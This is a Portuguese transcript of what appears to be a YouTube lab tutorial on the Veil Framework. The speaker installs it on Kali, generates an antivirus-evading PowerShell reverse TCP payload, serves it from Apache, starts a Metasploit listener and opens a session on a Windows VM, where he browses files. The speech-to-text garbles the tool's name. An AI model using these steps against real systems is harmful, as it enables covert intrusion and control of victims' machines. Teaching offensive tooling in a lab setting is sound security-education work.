Olá pessoal, bom dia, boa tarde, boa noite, como vocês estão? Eu espero que vocês estejam bem. Bom, primeiramente aí eu quero agradecer a todos que têm se inscrito, assistido, curtido o canal, comentado, né? Eu vou pedir para você agora que não é inscrito no canal, que assiste o vídeo e tal. Se inscreve no meu canal, não te custa nada, tá? Não vou ficar incomodando com muita notificação, prometo. E também vai ajudar a crescer o meu canal e incentivar a fazer mais vídeos. E o pessoal que me conhece da universidade sabe que eu tenho uma paixão por ensino. Eu gosto muito de ensinar, de colaborar com conhecimento. Então, aí você até me incentiva a ensinar mais. Não que isso seja a principal parte, mas eu acredito que quanto maior a comunidade, mais conhecimento a gente passa, né? Então, vamos lá. Hoje eu vou falar sobre o Vail Framework. O Vail Framework, ele foi desenhado para o desenvolvimento ou para a criação de payloads para ser usado junto com o Metasploit ou o MSF Console. Tá. Ele foi criado, se não estou enganado, em 2015. Até 2017, 2018, a maioria dos payloads que eram criados pelo Vail eram praticamente invisíveis aos firewalls, as soluções de antivírus, tá? Antivírus comuns, eles eram mais pegos por soluções endpoint, que tem uma apuração mais avançada, um filtro mais avançado. Tá? Então, beleza. O que nós precisamos fazer antes de usar o Vail? Vamos lá. Recapitulando uma coisa aqui do canal. Esse vídeo é simplesmente educacional. Eu não sou responsável pelas cagadas que você vai fazer na sua vida. Tá? Eu não sou responsável pelas coisas erradas que você vai fazer após assistir esse vídeo. Eu não sou responsável pelas coisas que você vai fazer assistindo e aprendendo o conteúdo desse vídeo. Perfeito? Se a polícia bater na sua casa 2, 3 horas da manhã, a culpa não é minha, a culpa é sua. Tá? Se você tentar invadir uma empresa, invadir um computador remoto, um computador alheio que você não tem permissão, após assistir essa aula ou qualquer outra aula do canal, a responsabilidade é toda sua. Esse aqui é um canal para passar conhecimento e nada mais que isso, beleza? Então vamos lá. Primeiro, nós precisamos baixar o Vail Framework. Eu já tenho o Vail na minha máquina. Eu tenho duas versões, na verdade, tá? O que que acontece? Eu vou criar uma pasta chamada Vail 1 mkdir. Isso aqui vocês não precisam fazer, tá, pessoal? Deixa eu fazer assim, melhor. Eu vou abrir aqui. Vou deletar este aqui. Tá? Vou deletar este aqui também. Vou deixar só esse que é o principal. Vou abrir o meu terminal aqui. Eu vou criar uma pasta chamada mkdir vail, em letra minúscula. Beleza, eu criei a pasta vail. CD vail. Oh. CD. Veio. O que que acontece? O Veio ele não vem instalado no Linux, no Kali Linux por padrão, tá? Então nós precisamos aí, só um minutinho que eu tô trabalhando. Aí já foi, beleza. Aí já passou do horário. Ele não vem pré-instalado no Kali Linux, então nós precisamos baixar ele do GitHub. Como nós fazemos isto? Primeiro, se você não tem o GitHub ou o Git na sua máquina, sudo apt, vamos instalar ele, install git. Tá? Eu vou entrar com a minha senha, ele vai instalar o Git, mas eu já tenho ele instalado, então ele não vai continuar a instalação, porque eu já tenho ele. Ctrl L para limpar a tela. Agora, como eu clono o framework do GitHub, simples, git, tá? Clone, né? Clonar, https, barra, barra, github.com/, veio, traço, framework, barra, veio.git, e vou dar um enter. Ele vai clonar o git, tá? Veja bem, eu já tenho o git instalado. Tá?
Deixa eu só tirar essa música que tá perturbando a minha alma. Aqui. Nossa, gente, pra que tudo isso de claridade? Deixa eu diminuir isso aqui. Deixa eu ver. Não tem, vai sem música mesmo. Desculpa, pessoal. Como que nós instalamos, tá? Veja bem, eu vou dar um ls aqui, eu vou ter o veio cd, veio, e aí eu vou dar um ls de novo. Eu vou na pasta config, cd config, vou dar um ls. Aqui na pasta config eu tenho um arquivo chamado setup. Esse arquivo vai ser para fazer a instalação do veio, tá? Então, para fazer a instalação, coisa que eu não irei fazer, porque eu já fiz, tá? E é muito, muito simples. Você simplesmente faz ponto barra setup.sh force para forçar a instalação e silent, tá? Para fazer em modo silencioso, tá? E aí, que é isso aqui? A notificação de trabalho, desculpa. E aí você pressiona o enter. Quando você pressionar o Enter, ele vai começar a instalar uma série de ferramentas, inclusive um compilador Python, tá? Que não é um compilador, tá? Ele converte um script Python para executável e um compilador Ruby que vai converter o Ruby para executável também. Se ele pedir para confirmar qualquer coisa durante a instalação, a gente instala. Se ele pedir para aceitar qualquer coisa, simplesmente aceite, tá? Sair daqui, voltar para minha pasta home. CD veio. Tá. Agora, como eu inicio o veio depois da instalação? Você vai voltar para a pasta principal do veio, que é o CD veio, ponto, barra veio.py. Como ele é feito em Python, ele é o py, que é a extensão do arquivo. Veja bem, o veio é muito simples de você usar. Vai ter um ponto que ele vai ser bem parecido com o Metasploit na hora de configuração. Então vamos lá. Aqui eu tenho o cabeçalho dele, né, o header dele, o banner. Aí aqui eu tenho o main menu, ou seja, o menu principal, e ele me mostra que tem duas ferramentas que foram carregadas. Essas ferramentas são a primeira, o evasion, que é evasão, e o segundo, ordnance, tá? Que é ordenança. E aí eu tenho os comandos available commands. O comando exit, por exemplo, ele simplesmente sai do veio e volta para o terminal do Kali. Simples. O info, ele pega a informação de uma ferramenta específica. O list, ele vai listar uma ferramenta específica, tá? Ou a lista de ferramentas disponíveis. Options, ele vai mostrar as configurações do veio, as configurações, as opções de configuração. Update, ele vai atualizar o veio. E o use, ele vai usar uma ferramenta específica. Bom, primeiro, vamos passo a passo, pensar aqui num passo a passo legal. Quando eu estou num lugar ou usando uma ferramenta que eu não conheço, eu daria um help, tá? Beleza, a gente já está dentro da ferramenta. Agora, eu não sei o que que eu tenho de ferramenta disponível, então eu preciso listar essas ferramentas. O que que eu faço? List. Ele vai me dar as duas ferramentas que foram listadas. Perfeito, eu tenho as ferramentas listadas. Mas eu não sei como usá-las, eu não sei para que serve essa ferramenta, né? Vamos supor que eu quero usar a ferramenta 1. Eu nunca vi a ferramenta, não sei para que serve, não conheço, então eu vou querer as informações. Então, info 1. E aqui nós temos evasion, que é evasão. Gera executáveis
evitando antivírus, ou seja, generates antivirus avoiding executables. Ele gera executáveis que fazem uma evasão do antivírus, ou seja, eles tentam se blindar do antivírus e permanecer invisíveis, tá? Aí aqui, se eu der aqui um info 2, ó, generates shellcode for supported payloads, ou seja, ele vai gerar uma conexão de shellcode para os payloads que tem na lista. Perfeito? Agora, eu preciso usar essa ferramenta. Então, eu vou usar a ferramenta e use um, tá? Beleza, nós entramos na ferramenta 1. Veja bem o que que nós temos aqui. Veio evasion, tá? Evasão veio. 41 payloads carregados. Só que está começando a ficar bem parecido com o Metasploit. Lembra que eu falei para vocês que ele é bem parecido com algumas coisas? Então, agora o que que eu vou fazer? Available commands. Back, ou seja, eu volto para o menu principal do Veio. O check VT. Checar o vírus total contra as hashes geradas. Por exemplo, eu criei um vírus, um payload. E eu quero checar se essa hash ela já está na biblioteca do vírus total. Porque se está na biblioteca do vírus total, provavelmente a maioria dos antivírus vai ter a hash, a assinatura desse payload. O clean, eu limpo todos os artefatos depois de gerado o payload. O exit, eu vou voltar para o Kali Linux, terminal do Kali. O info é information, né? Eu vou pegar a informação de um específico payload. O list, eu vou listar os payloads. E o use, eu vou usar um payload. Então voltamos ao ponto. Pensando logicamente, beleza? Eu tenho 41 payloads, mas eu não sei quais são os payloads. Eu não sei numeração, não sei nome. Então o que eu vou fazer? List. Tá, beleza. Aqui eu listei todos os payloads. Nós temos 41. Tem a shellcode aqui, inject. Eu tenho módulos auxiliares, tá? E aqui eu tenho payload do nível muito baixo, que é em C. Eu tenho em C Sharp. Tenho na linguagem Go. Tenho em Lua. Em Pure. PowerShell. Python e Ruby. Ou Ruby, né? Ruby. Agora, beleza, eu listei. Agora eu vou querer a informação. Por exemplo, eu vou pegar aqui. Vou pegar esse 22 aqui, ó. Ó, eu vou fazer assim, ó. Info 22. Ó, ele vai me dar todas as opções, todas as informações de configuração desse payload, tá vendo? Tem tudo. Agora tá bem, bem, bem similar ao Metasploit, né? Então vamos lá. Vai ficar um pouquinho mais agora na configuração. Tá? Aqui eu tenho opções requeridas, né, necessárias. Aí aqui estão, eu posso colocar como true. Tá, que ele vai checar não, por mal conhecidos MAC address, ou seja, ele vai pegar uma lista, vai verificar se esse MAC address está em uma lista negra ou coisa assim. Tá, aí aqui eu tenho o domain, tá, o host, o domínio do AD e tal. Aí eu tenho hostname, eu poderia colocar hostname, o lhost, que é o IP do atacante, a lport, que é a porta do computador do atacante, né, ou da rede do atacante. Username também não precisa, porque a gente não vai usar o username. Perfeito. Agora eu já tenho a informação. Eu preciso usar esse payload. Então eu vou fazer o quê? Use 22. Vou dar um enter. Beleza. Deixa eu só ver se essa máquina está ligada. Tá. Beleza. Agora eu preciso dar um set. Aqui, ó. Eu preciso configurar o IP. Então, set lhost 192.168.79.139. Provavelmente a sua rede vai ter um IP diferente, tá? Porque esse IP aqui eu configurei aqui no meu Mac da VMware, no nas configurações de rede da VMware, aqui, tá? No Virtual Networks Editor, set lport 443. Eu vou setar a porta 443. Beleza. Configurei o IP, eu configurei a porta. Agora o que eu preciso fazer? Eu tenho ali algumas opções. O back, que ele vai me fazer voltar na opção anterior do menu. Eu tenho o exit, que vai sair do veio, que é uma opção que a gente não quer.
Eu tenho o generate the payload, que é para gerar o payload, eu tenho os options do payload, ele vai mostrar as opções do payload e eu tenho o set, coisa que nós já fizemos. Então, se for pensar logicamente, agora vem o generate, que é o gerar payload. Então, generate, ok? E dar um enter. Agora, aqui ele está falando assim, ó, please enter the base name for the output files. Ou seja, the full is payload, ou seja, entre com o nome base para os arquivos de saída, ou seja, os arquivos convertidos ou os arquivos compilados, tá? O nome default, o nome padrão é payload, eu não quero payload, eu quero botar aqui obelix 443. Vou dar enter, beleza. Vejam bem aqui, ó. Olha o que aconteceu. Eu dei o nome, ele gerou. E aqui ele colocou assim, ó, a linguagem, ele me dá o detalhe da linguagem que foi feito, tá? Linguagem PowerShell, o módulo do payload, payload module, tá? É este aqui lá. E se você for lá no Metasploit e carregar o Metasploit e procurar por esse payload, vai estar lá, PowerShell Metaproprietary Reverse TCP. Aí o PowerShell doesn't compile, so just get text. Ou seja, o PowerShell, ele não compila por ser uma linguagem de script. Linguagens de script, Python, JavaScript, PowerShell, Bash, eles não compilam, não são linguagens que são compiladas, são linguagens que são interpretadas. Então, o que que acontece? O PowerShell, ele gerou para a gente um arquivo de texto que foi salvo como um bat aqui, ó, como um bat aqui, tá vendo? Agora, aqui em seguida, ele nos dá aqui, ó, source code written to, ou seja, o código fonte foi escrevido na pasta X, e aqui ele nos dá a pasta. Agora, uma coisa muito importante e muito boa para a gente não perder tempo e ter que ir lá no MSF console. Quer ver, ó? Eu vou iniciar aqui MSF console. Se eu fosse configurar tudo no MSF Console, eu ia ter que configurar o payload, ia ter que colocar um listener, eu ia ter que colocar um monte de coisa, eu ia perder um pouco de tempo. Eu perdi um pouco de tempo aqui, tá? No veio, mas eu ganhei tempo aqui. Por quê? Veja bem, eu vou pegar esse código aqui. Primeiro eu vou pegar isso aqui, tá? Dá um Ctrl C ou Ctrl Shift mais C. Deixa eu criar aqui um novo terminal. Sudo cp, vou dar um Ctrl V, tá? E vou jogar no meu var www.html e vou dar um enter. Vai me pedir a senha, eu coloco a senha, beleza. Eu copiei o obelix 443 bat para a pasta html, que é a pasta do servidor web, do meu Apache. Sudo sysctl start. Apache 2. Enter, beleza, eu iniciei o Apache. Agora, o que que eu vou fazer? Eu vou vir aqui, ó, Metasploit resource file writing to. Ele escreveu um recurso para usarmos no Metasploit. Veja bem, é como eu estava falando, se nós fôssemos fazer tudo aqui pelo Metasploit, a gente ia ter que configurar primeiro o payload, fazer a configuração e aí colocar o listener. Nós configuramos o payload aqui no veio. Agora eu vou usar um simples comando aqui no Metasploit. Resource. Vou dar um Ctrl Shift V para usar e pressionar o Enter. Ele já iniciou a escuta, ou seja, ele já está escutando por trabalhos, ó. Tá vendo? Ele configurou tudo aqui já para mim. E aí ele já está escutando. Lembrando, pessoal, que isso aqui não é uma aula de como você fazer um delivery de payload, tá? Não é uma aula de engenharia social, não é uma aula de nada, tá? Isso aqui é uma aula de como você usar o Vail, é uma introdução do Vail Framework para gerar payloads, tá? Lembrando, não é uma aula de evasão especificamente, não é uma aula de engenharia social, não é uma aula de como você fazer a entrega de um payload, não é esse tipo de aula, é simplesmente uma aula de como você usa o Vail Framework para fazer uso de payloads, tá bom? Para criar payloads e jogar lá e usar com Metasploit, tá bom? Eu vou colocar aqui, ó, obelix
443.bat. Não enter. Ó, ele vai avisar, lembrando que ele está avisando porque isso aqui não é uma aula de como fazer obfuscação, não é uma aula de como fazer, modificar o payload para entregar ele, não é uma aula de engenharia social, não é uma aula de como fazer o delivery do payload, tá? É uma aula só para mostrar a ferramenta MS, Avail Framework, tá bom? Vou dar um keep. Ele vai falar aqui que make sure you trust before you open it, ok? Eu vou manter esse arquivo. Vou abrir o arquivo na pasta, tá? E vou executar. Deixa eu ver aqui. Ele vai falar tal, eu vou dar um run anyway. Ele rodou. E deixa eu ver se ele pegou aqui. Tá, ele não pegou provavelmente por questão do antivírus do Windows. Tá, deixa eu ver aqui uma coisa, se ele vai rodar. Ah, ele tá escutando. Pera aí, com certeza foi o antivírus. 99% de certeza que foi, porque o Windows Defender, cara, ultimamente o Windows Defender, ele tem ganhado assim de Windows Defender Security Settings. Ele tem ganhado de muitos outros antivírus aí de uma maneira, não tem nem como comparar, tá? Aqui, deixa eu abrir aqui, Protection, beleza. Tá, lembrando que não é uma aula de como você fazer entrega de payload, não é uma área de obfuscação, uma aula de obfuscação, é só uma aula de como você entrega, de só você gerar um payload no Veil. So, ó, começo a falar inglês, cara. Aqui, Sessions, ele vai me dar Sessions e 1. Ele vai me dar a sessão, tá? LS, ó, eu vou pegar aqui o desktop, tá? O back, CD, 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 LS. Ó, aqui eu tô no C, tal, poderia usar qualquer coisa para deletar aqui. Pagefile, por exemplo, poderia deletar, poderia fazer um monte de coisa aqui. Poderia dar um screenshot dessa parte ali também. Tá? Então, assim, essa que foi uma aula para mostrar o uso do Veil Framework, tá? Ele é um pouco antigo, mas ele continua funcionando se você saber como lidar com ele. Desculpa. Você consegue obfuscar o Veil dentro de um arquivo, dentro de uma foto, texto. Principalmente as versões em PowerShell, porque ele não gera executável, ele gera um texto. E quem assistiu o texto lá do payload com a macro e com o PowerShell vai entender a funcionalidade do Veil. A gente não precisa usar o MS Venom e o Veil é mais estruturado, eu acredito, para fazer isso. Tá? Então é isso, pessoal. Agradeço a vocês que. Os inscritos do canal, agradeço a vocês que estão assistindo os vídeos. Se você gostou, dá um like aí, compartilha, se inscreve no canal e até o próximo vídeo, pessoal. Abraço a todos aí.